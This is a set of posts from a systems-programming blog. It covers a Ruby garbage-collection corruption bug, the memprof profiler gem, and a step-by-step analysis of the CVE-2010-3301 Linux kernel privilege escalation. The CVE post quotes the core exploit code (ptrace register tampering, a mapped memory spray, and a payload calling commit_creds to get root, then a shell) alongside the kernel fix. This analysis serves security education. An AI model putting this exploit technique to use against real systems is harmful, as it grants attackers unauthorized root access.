The Broken Promises of MRI/REE/YARV »
Created at: 05.07.2011 16:00, source: time to bleed by Joe Damato, tagged: bugfix debugging linux osx ruby systems x86

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.
tl;dr
This post is going to explain a serious design flaw of the object system used in MRI/REE/YARV. This flaw causes seemingly random segfaults and other hard to track corruption. One popular incarnation of this bug is the “rake aborted! not in gzip format.”
theme song
This blog post was inspired by one of my favorite Papoose verses. If you don’t listen to this while reading, you probably won’t understand what I’m talking about: get in the zone.
rake aborted! not in gzip format
[BUG] Segmentation fault
If you’ve seen either of these error messages you are hitting a fundamental flaw of the object model in MRI/YARV. An example of a fix for a single instance of this bug can be seen in this patch. Let’s examine this specific patch so that we can gain some understanding of the general case.
FACT: What you are about to read is absolutely not a compiler bug.
A small, but important piece of background information
The amd64 ABI [1] states that some registers are caller saved, while others are callee saved. In particular, the register rax is caller saved. The callee will overwrite the value in this register to store its return value for the caller, so if the caller cares about what is stored in this register, it must copy the value somewhere else prior to a function call.
stare into the abyss part 1
Let’s look at the C code for gzfile_read_raw_ensure WITHOUT the fix from above:
#define zstream_append_input2(z,v)\
    zstream_append_input((z), (Bytef*)RSTRING_PTR(v), RSTRING_LEN(v))

static int
gzfile_read_raw_ensure(struct gzfile *gz, int size)
{
    VALUE str;

    while (NIL_P(gz->z.input) || RSTRING_LEN(gz->z.input) < size) {
        str = gzfile_read_raw(gz);
        if (NIL_P(str)) return Qfalse;
        zstream_append_input2(&gz->z, str);
    }
    return Qtrue;
}
It looks relatively sane at first glance, but to understand this bug we’ll need to examine the assembly generated for this thing. I’m going to rearrange the assembly a bit to make it easier to follow and add a few comments along the way.
First, the code begins by setting the stage:
push %rbp
movslq %esi,%rbp # sign extend "size" into rbp
push %rbx
mov %rdi,%rbx # rbx = gz
sub $0x8,%rsp # make room on the stack for "str"
The above is pretty basic. It is your typical amd64 prologue. After things are all set up, it is time to enter the while loop in the C code above:
jmp 1180 # JUMP IN to the loop
Next comes the NIL_P(gz->z.input) portion of the while-loop condition:
mov 0x18(%rbx),%rax # rax = gz->z.input
cmp $0x4,%rax # in Ruby, nil is represented as 4.
je 1190 [gzfile_read_raw_ensure+0x30] # if gz->z.input is nil, enter the loop
Now the RSTRING_LEN(gz->z.input) < size portion:
cmp %rbp,0x10(%rax) # compare size and gz->z.input->len
jge 11b0 [gzfile_read_raw_ensure+0x50] # jump out of loop
# if gz->z.input->len is >= size
Next comes the call to gzfile_read_raw and the NIL_P(str) check. If this check fails, the code just falls through and exits the loop:
mov %rbx,%rdi # rdi = gz, rdi holds the first argument to a function.
callq 1090 [gzfile_read_raw] # call gzfile_read_raw
cmp $0x4,%rax # compare return value (%rax) to nil
jne 1170 [gzfile_read_raw_ensure+0x10] # if it is NOT nil jump to the good stuff
The return value of gzfile_read_raw (an address of a ruby object) is stored in rax.
And finally, the good stuff. The call to zstream_append_input:
mov 0x10(%rax),%rdx # RSTRING_LEN(v) as 3rd arg
mov 0x18(%rax),%rsi # RSTRING_PTR(v) as 2nd arg
mov %rbx,%rdi # set gz->z as the 1st arg
callq 10e0 [zstream_append_input] # let it rip
Note that the arguments to zstream_append_input are moved into registers by offsetting from rax. When the call to zstream_append_input occurs, the ruby object returned from gzfile_read_raw is still stored only in rax and has not been written to its slot on the stack, because the extra write is unnecessary.
stare into the abyss part 2
Alright, so the patch changes the zstream_append_input2 macro to this:
#define zstream_append_input2(z,v)\
RB_GC_GUARD(v),\
zstream_append_input((z), (Bytef*)RSTRING_PTR(v), RSTRING_LEN(v))
And, RB_GC_GUARD is defined as:
#define RB_GC_GUARD_PTR(ptr) \
__extension__ ({volatile VALUE *rb_gc_guarded_ptr = (ptr); rb_gc_guarded_ptr;})
#define RB_GC_GUARD(v) (*RB_GC_GUARD_PTR(&(v)))
That code is just a hack to mark the memory location holding v with the volatile type qualifier. This tells the compiler that memory backing v acts in ways that the compiler is too stupid to understand, so the compiler must ensure that reads and writes to this location are not optimized out.
A common usage of this qualifier is for memory mapped registers. Reads from memory mapped registers should not be optimized away since a hardware device may update the value stored at that location. The compiler wouldn't know when these updates could happen so it must make sure to re-read the value from this memory location when it is needed. Similarly, writes to memory mapped registers may modify the state of a hardware device and should not be optimized away.
Most of the code generated with the patch applied is the same as without except for a few slight differences before zstream_append_input is called. Let's take a look:
mov %rax,-0x18(%rbp) # write str to the stack
mov -0x18(%rbp),%rax # read the value in str back to rax
mov 0x10(%rcx),%rdx # RSTRING_LEN(v)
mov 0x18(%rcx),%rsi # RSTRING_PTR(v)
mov %rbx,%rdi # z
callq 1f60 [_zstream_append_input]
The key difference is that the return value of gzfile_read_raw is written back to its memory location (which, in this case, happens to be on the stack and is called str).
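To make the effect of the guard a bit more concrete, here is a minimal sketch outside of Ruby. Everything in it (value_t, fake_string, gc_guard, guarded_length) is a hypothetical stand-in and not Ruby's actual API. It only illustrates the trick: reading a variable through a volatile pointer means the compiler, in practice, has to give that variable a home in memory before the read.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for Ruby's VALUE: a pointer-sized integer. */
typedef uintptr_t value_t;

/* Hypothetical object layout; only the fields this sketch needs. */
struct fake_string {
    size_t len;
    const char *ptr;
};

/*
 * Read the variable at `slot` through a volatile pointer. A volatile read
 * may not be optimized away, so the variable must actually live in memory
 * (for a local, its stack slot) at this point.
 */
static inline value_t gc_guard(volatile value_t *slot)
{
    return *slot;
}

/*
 * Taking the address of `str` and reading it back through gc_guard keeps a
 * copy of the object's address on the stack, where a conservative stack
 * scan could find it.
 */
size_t guarded_length(value_t str)
{
    value_t pinned = gc_guard(&str);
    return ((const struct fake_string *)pinned)->len;
}
```

This is the same idea as the RB_GC_GUARD macro above, written as an inline function instead of a gcc statement expression. Whether a particular compiler emits exactly the store and load shown in the assembly is something to confirm with objdump, not something to assume.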
the bug
The bug is triggered because:
- The address of the ruby object str is stored in a caller saved register, rax.
- The callee (zstream_append_input) does not save the value of rax (it is not required to) and rax is overwritten in the function, leaving no references to the ruby object returned by gzfile_read_raw.
- The callee (zstream_append_input) eventually calls rb_newobj. rb_newobj may trigger a GC run, if there are no available objects on the freelist.
- The GC run finds the object returned by gzfile_read_raw but sees no references to it and frees the memory associated with it.
- The freed object is used as if it were valid, and memory corruption occurs causing the VM to explode.
The patch prevents this bug from happening because:
- The address of the ruby object str is stored in a caller saved register, rax.
- The volatile type qualifier causes the compiler to generate code which writes the return value back into its memory location on the stack.
- The callee (zstream_append_input) eventually calls rb_newobj. rb_newobj may trigger a GC run, if there are no available objects on the freelist.
- The GC run finds the object returned by gzfile_read_raw and finds a reference to it and therefore does not free it.
- Everyone is happy.
The general case
Given valid C code, gcc will generate machine instructions that correctly do what you want. Of course, there are bugs in gcc just like any other piece of software. The problem in this case is not gcc. The problem is that the object and garbage collection implementations in REE/MRI/YARV are not valid C code, so it is not possible for gcc to generate machine instructions that do the right thing. In other words, Ruby's object and GC implementations are breaking their contract with gcc.
The end result is the need for shit like RB_GC_GUARD in REE/MRI/YARV and also in Ruby gems to selectively paper over valid gcc optimizations. Having an API that might cause the Ruby VM to fucking explode unless you proactively mark things with RB_GC_GUARD is not on the path of least resistance toward building a maintainable, safe, and performant system. Very few people out there know that the volatile type qualifier exists, let alone what it does. Essentially, this means that authors of Ruby gems must understand how GC works in the VM to prevent their gems from causing GC to break the universe.
That is fucking beyond stupid.
How to detect this bug class
This could be detected by building a simple static analysis tool. You won't catch 100% of cases, and you will definitely have false positives, but it is better than nothing. Something like this should work:
- Build a call digraph of the VM and/or the set of gems you care about.
- Find all paths leading to the rb_newobj sink.
- Find all paths which call rb_newobj, but do not save rax prior to making another function call which is also on a path to rb_newobj.
- The functions found are very likely to be causing corruption. A human will need to examine the found cases to weed out false positives and to fix the code.
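The first two steps above can be sketched as a reachability search over a call graph. The sketch below is only an illustration under loud assumptions: the graph is built by hand, functions are identified by small integer ids, and call_graph, graph_add_call and reaches_sink are hypothetical names. A real tool would have to extract the edges from the binary or the source, and the register analysis in the third step is not covered at all.

```c
#include <stdbool.h>
#include <string.h>

#define MAX_FUNCS 16

/* calls[a][b] is true when function a contains a call to function b. */
struct call_graph {
    int n;
    bool calls[MAX_FUNCS][MAX_FUNCS];
};

void graph_init(struct call_graph *g, int n)
{
    g->n = n;
    memset(g->calls, 0, sizeof g->calls);
}

void graph_add_call(struct call_graph *g, int caller, int callee)
{
    g->calls[caller][callee] = true;
}

/* Depth-first search; `seen` stops the walk from looping on recursion. */
static bool dfs(const struct call_graph *g, int from, int sink, bool *seen)
{
    if (from == sink)
        return true;
    if (seen[from])
        return false;
    seen[from] = true;
    for (int next = 0; next < g->n; next++) {
        if (g->calls[from][next] && dfs(g, next, sink, seen))
            return true;
    }
    return false;
}

/* True when some chain of calls starting at `from` ends in `sink`. */
bool reaches_sink(const struct call_graph *g, int from, int sink)
{
    bool seen[MAX_FUNCS] = { false };
    return dfs(g, from, sink, seen);
}
```

With ids assigned so that, say, 0 is gzfile_read_raw_ensure, 1 is zstream_append_input and 3 is rb_newobj, reaches_sink(&g, 0, 3) would flag the function from this post as a candidate for a closer look by a human.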
If you have found yourself wondering who the fuck would write such a test, note that rtld in Linux does not save the SSE registers (which are supposed to be caller saved) prior to entering the fixup function. To ensure that this optimization does not cause the fucking universe to come crashing down, a test ships with the code that runs objdump after building the binary. The objdump output is then grepped for any instructions which might modify the SSE registers. As long as no one touches the SSE registers, there is no need to save and restore them.
If Ruby's object and GC subsystems want to prevent the universe from exploding, they must supply an equivalent test to ensure that corruption is impossible.
Conclusion
- MRI/YARV/REE are inherently fatally flawed.
- I'm never writing another Ruby-related blog post.
- I'm not a Ruby programmer.
No comments
I'm taking a page from the book of coda and disabling comments. If you got something to say, write a blog post.
References
detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301) »
Created at: 27.09.2010 14:59, source: time to bleed by Joe Damato, tagged: linux security systems x86 bugfix kernel privilege escalation privileges syscall vulnerability x86_64

tl;dr
This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.
This article is long and technical; prepare yourself.
ia32 syscall emulation
There are two ways to invoke system calls on the Intel/AMD family of processors:
- Software interrupt 0x80.
- The sysenter family of instructions.
The sysenter family of instructions is a faster syscall interface than the traditional int 0x80 interface, but isn’t available on some older 32bit Intel CPUs.
The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call, thus maintaining support for this older system call interface.
This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.
ptrace(2) and the ia32 syscall emulation layer
From the ptrace(2) man page (emphasis mine):
The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.
If we examine the IA32 syscall emulation code we see some code in place to support ptrace [1]:
ENTRY(ia32_syscall)
/* . . . */
GET_THREAD_INFO(%r10)
orl $TS_COMPAT,TI_status(%r10)
testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
jnz ia32_tracesys
This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.
Let’s take a look [2]:
ia32_tracesys:
/* . . . */
call syscall_trace_enter
LOAD_ARGS32 ARGOFFSET /* reload args from stack in case ptrace changed it */
RESTORE_REST
cmpl $(IA32_NR_syscalls-1),%eax
ja int_ret_from_sys_call /* ia32_tracesys has set RAX(%rsp) */
jmp ia32_do_call
END(ia32_syscall)
Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.
Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax
This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.
Let’s take a look at the LOAD_ARGS32 macro [3]:
.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm
Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.
Let’s take a look at ia32_do_call which actually transfers execution to the system call [4]:
ia32_do_call:
IA32_ARG_FIXUP
call *ia32_sys_call_table(,%rax,8) # xxx: rip relative
The system call invocation code is calling the function whose address is stored at the memory location ia32_sys_call_table + (8 * %rax). That is, the %rax-th entry in the ia32_sys_call_table, since each entry is an 8 byte function pointer.
subtle bug leads to sexy exploit
This bug was originally discovered by the Polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.
The exploit is made possible by three key things:
- The register %eax is not touched in the LOAD_ARGS32 macro and can be set to any arbitrary value by a call to ptrace.
- The ia32_do_call code uses %rax, not %eax, when indexing into the ia32_sys_call_table.
- The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32bits of %rax will be ignored by this check.
These three stars align and allow an attacker to cause an integer overflow in ia32_do_call, causing the kernel to hand off execution to an arbitrary address.
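The mismatch between the check and the use can be shown in a few lines of C. This is a sketch, not kernel code: NR_SYSCALLS is a made-up table size and the function names are hypothetical. The point is only that a comparison on the low 32 bits accepts a value that the 64-bit index then uses in full.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical table size; the real IA32_NR_syscalls differs by kernel. */
#define NR_SYSCALLS 0x200u

/* Mimics `cmpl $(NR-1),%eax; ja reject`: only the low 32 bits are compared. */
bool check_low32(uint64_t rax)
{
    return (uint32_t)rax <= NR_SYSCALLS - 1;
}

/* What the check would have to do if the full register is used as the index. */
bool check_full64(uint64_t rax)
{
    return rax <= NR_SYSCALLS - 1;
}

/* Byte offset into a table of 8 byte entries, as in `table(,%rax,8)`. */
uint64_t table_offset(uint64_t rax)
{
    return rax * 8;
}
```

With rax set to 0x800000101, check_low32 sees 0x101 and lets the call through, check_full64 rejects it, and table_offset yields 0x4000000808, far past the end of any real table.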
Damnnnnn, that’s hot.
the exploit, step by step
The exploit code is available here and was written by Ben Hawkes and others.
The exploit begins execution by forking and executing two copies of itself:
if ( (pid = fork()) == 0) {
    ptrace(PTRACE_TRACEME, 0, 0, 0);
    execl(argv[0], argv[0], "2", "3", "4", NULL);
    perror("exec fault");
    exit(1);
}
The child process is set up to be traced with ptrace by making a PTRACE_TRACEME request.
The parent process enters a loop:
for (;;) {
    if (wait(&status) != pid)
        continue;
    /* ... */
    rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
    if (rax == 0x000000000101) {
        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
            printf("PTRACE_POKEUSER fault\n");
            exit(1);
        }
        set = 1;
    }
    /* ... */
    if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
        printf("PTRACE_SYSCALL fault\n");
        exit(1);
    }
}
The parent calls wait and blocks until the child enters a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.
While this is happening, the child process is executing. It begins by looking up the addresses of two symbols in the kernel:
commit_creds = (_commit_creds) get_symbol("commit_creds");
/* ... */
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
/* ... */
Next, the child process attempts to create an anonymous memory mapping using mmap:
if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
/* ... */
This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).
This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).
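The wraparound is easy to check by hand with unsigned 64-bit arithmetic. The sketch below just replays the numbers from the text; the function names and the 4 KB page size are assumptions made for the illustration, not taken from the exploit source.

```c
#include <stdint.h>

/* Base address used in the exploit's arithmetic above. */
#define TABLE_BASE 0xffffffff80000000ULL

/* Assumes 4 KB pages. */
#define PAGE_MASK_4K (~0xfffULL)

/* base + rax * 8, wrapping modulo 2^64 just like the address computation. */
uint64_t wrapped_entry_address(uint64_t rax)
{
    return TABLE_BASE + rax * 8;
}

/* Round an address down to the start of its page. */
uint64_t page_align_down(uint64_t addr)
{
    return addr & PAGE_MASK_4K;
}
```

For rax = 0x800000101 the product is 0x4000000808, and adding it to the base overflows 64 bits, leaving 0x3f80000808. Rounding that down to a page boundary gives 0x3f80000000, the address passed to mmap.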
Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:
int kernelmodecode(void *file, void *vma)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}
The address of that function is written over and over to the 64 MB of memory that was mapped in:
for (; (uint64_t) ptr < (tmp + size); ptr++)
*ptr = (uint64_t)kernelmodecode;
Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:
__asm__("\n"
"\tmovq $0x101, %rax\n"
"\tint $0x80\n");
/* . . . */
execl("/bin/sh", "bin/sh", NULL);
tying it all together
When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.
The child executes the erroneous check described above:
cmpl $(IA32_NR_syscalls-1),%eax
ja int_ret_from_sys_call /* ia32_tracesys has set RAX(%rsp) */
jmp ia32_do_call
Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.
Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.
call *ia32_sys_call_table(,%rax,8)
Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.
kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode, setting the privilege level of the process to that of init.
The system has been rooted.
The fix
The fix is to zero the upper half of rax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.
Conclusions
- Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
- The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
- Code reviews play a really important part in the overall security of the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
- I'm not a Ruby programmer.
References
- http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424
- http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439
- http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50
- http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430
Descent into Darkness: Understanding your system’s binary interface is the only way out »
Created at: 15.03.2010 21:11, source: time to bleed by Joe Damato, tagged: bugfix debugging linux ruby scaling systems x86 debug garbage collection GC memory performance syscall x86_64
Download as PDF (3mb)
Descent into Darkness: Understanding your system’s binary interface is the only way out.
Garbage Collection Slides from LA Ruby Conference »
Created at: 21.02.2010 00:03, source: time to bleed by Joe Damato, tagged: bugfix debugging ruby debug garbage collection GC memory performance profiling
Garbage Collection and the Ruby Heap
memprof: A Ruby level memory profiler »
Created at: 11.12.2009 14:59, source: time to bleed by Joe Damato, tagged: bugfix debugging linux monitoring ruby systems x86 debug garbage collection GC memory performance profiling system health x86_64

What is memprof and why do I care?
memprof is a Ruby gem which supplies memory profiler functionality similar to bleak_house without patching the Ruby VM. You just install the gem, call a function or two, and off you go.
Where do I get it?
memprof is available on gemcutter, so you can just:
gem install memprof
Feel free to browse the source code at: http://github.com/ice799/memprof.
How do I use it?
Using memprof is simple. Before we look at some examples, let me explain more precisely what memprof is measuring.
memprof is measuring the number of objects created and not destroyed during a segment of Ruby code. The ideal use case for memprof is to show you where objects that do not get destroyed are being created:
- Objects are created and not destroyed when you create new classes. This is a good thing.
- Sometimes garbage objects sit around until garbage_collect has had a chance to run. These objects will go away.
- Yet in other cases you might be holding a reference to a large chain of objects without knowing it. Until you remove this reference, the entire chain of objects will remain in memory taking up space.
memprof will show objects created in all cases listed above.
OK, now let’s take a look at two examples and their output.
A simple program with an obvious memory “leak”:
require 'memprof'
@blah = Hash.new([])
Memprof.start
100.times {
@blah[1] << "aaaaa"
}
1000.times {
@blah[2] << "bbbbb"
}
Memprof.stats
Memprof.stop
This program creates 1100 objects which are not destroyed between the Memprof.start and Memprof.stop calls because references are held for each object created.
Let's look at the output from memprof:
1000 test.rb:11:String
100 test.rb:7:String
In this example memprof shows the 1100 objects created, broken up by file, line number, and type.
Let's take a look at another example:
require 'memprof'
Memprof.start
require "stringio"
StringIO.new
Memprof.stats
This simple program is measuring the number of objects created when requiring stringio.
Let's take a look at the output:
108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
14 test2.rb:3:String
2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
1 test2.rb:4:StringIO
1 test2.rb:4:String
1 test2.rb:3:Array
1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable
This output shows an internal Ruby interpreter type __node__ was created (these represent code), as well as a few Strings and other objects. Some of these objects are just garbage objects which haven't had a chance to be recycled yet.
What if we nudge the garbage collector along a little bit just for our example? Let's add the following two lines of code to our previous example:
GC.start
Memprof.stats
We're now nudging the garbage collector and outputting memprof stats information again. This should show fewer objects, as the garbage collector will recycle some of the garbage objects:
108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
2 test2.rb:3:String
2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable
As you can see above, a few Strings and other objects went away after the garbage collector ran.
Which Rubies and systems are supported?
- Only unstripped binaries are supported. To determine if your Ruby binary is stripped, simply run: file `which ruby`. If it is, consult your package manager's documentation. Most Linux distributions offer a package with an unstripped Ruby binary.
- Only x86_64 is supported at this time. Hopefully, I'll have time to add support for i386/i686 in the immediate future.
- Linux Ruby Enterprise Edition (1.8.6 and 1.8.7) is supported.
- Linux MRI Ruby 1.8.6 and 1.8.7 built with --disable-shared are supported. Support for --enable-shared binaries is coming soon.
- Snow Leopard support is experimental at this time.
- Ruby 1.9 support coming soon.
How does it work?
If you've been reading my blog over the last week or so, you'd have noticed two previous blog posts (here and here) that describe some tricks I came up with for modifying a running binary image in memory.
memprof is a combination of all those tricks and other hacks to allow memory profiling in Ruby without the need for custom patches to the Ruby VM. You simply require the gem and off you go.
memprof works by inserting trampolines on object allocation and deallocation routines. It gathers metadata about the objects and outputs this information when the stats method is called.
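The bookkeeping half of that idea can be sketched in plain C. To be clear, this is not memprof's implementation: the trampolines themselves are not shown, and live_object, track_alloc, track_free and live_at are hypothetical names. The sketch only assumes that some hook gets called with an address, file and line on allocation, and with the address again on deallocation.

```c
#include <stddef.h>
#include <string.h>

#define MAX_LIVE 1024

/* One record per object that has been allocated and not yet freed. */
struct live_object {
    const void *addr;
    const char *file;
    int line;
};

static struct live_object live[MAX_LIVE];
static size_t live_count;

/* Would be called from the allocation hook. Returns -1 if the table is full. */
int track_alloc(const void *addr, const char *file, int line)
{
    if (live_count == MAX_LIVE)
        return -1;
    live[live_count++] = (struct live_object){ addr, file, line };
    return 0;
}

/* Would be called from the deallocation hook; unknown addresses are ignored. */
void track_free(const void *addr)
{
    for (size_t i = 0; i < live_count; i++) {
        if (live[i].addr == addr) {
            live[i] = live[--live_count]; /* move the last record into the hole */
            return;
        }
    }
}

/* Number of still-live objects that were created at file:line. */
size_t live_at(const char *file, int line)
{
    size_t n = 0;
    for (size_t i = 0; i < live_count; i++) {
        if (live[i].line == line && strcmp(live[i].file, file) == 0)
            n++;
    }
    return n;
}
```

A stats call would then walk the table and print counts grouped by file and line, which is roughly the shape of the output shown earlier. A linear table keeps the sketch short; anything tracking a real heap would want a hash table keyed on the address.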
What else is planned?
Jake Douglas, Aman Gupta, and I have lots of interesting ideas for new features. We don't want to ruin the surprise, but stay tuned. More cool stuff coming really soon :)
Thanks for reading and don't forget to subscribe (via RSS or e-mail) and follow me on twitter.
